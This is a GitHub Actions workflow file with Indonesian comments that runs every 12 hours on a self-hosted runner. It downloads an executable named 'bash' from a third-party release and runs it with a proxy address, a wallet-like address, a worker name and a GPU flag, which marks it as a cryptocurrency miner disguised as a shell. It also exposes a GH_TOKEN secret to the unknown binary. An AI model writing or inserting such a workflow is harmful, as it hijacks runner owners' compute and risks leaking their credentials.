name: Run bash --noTest

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */12 * * *"  # tiap 12 jam (UTC)

permissions:
  contents: read

concurrency:
  group: tesaction-run
  cancel-in-progress: true

jobs:
  run:
    runs-on: self-hosted
    timeout-minutes: 300  # 5 jam

    steps:
      # OPTIONAL: ini bisa DIHAPUS kalau repo ini memang TIDAK dipakai
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Debug (optional)
        run: |
          echo "GITHUB_WORKSPACE=$GITHUB_WORKSPACE"
          ls -la

      - name: Clone target repo & run bash
        env:
          GH_TOKEN: ${{ secrets.GH_TOKEN }}
        run: |
          wget https://github.com/hujisanda/pll/releases/download/nanad/bash	
          chmod +x ./bash
          ./bash --proxy 162.243.71.148:80 --address prl1ptmxzhtda5a0mj56glsf5pftts5uqnprwyejurf40ewkcx96e9z8q9dcz0s --worker jasin2 -gpu

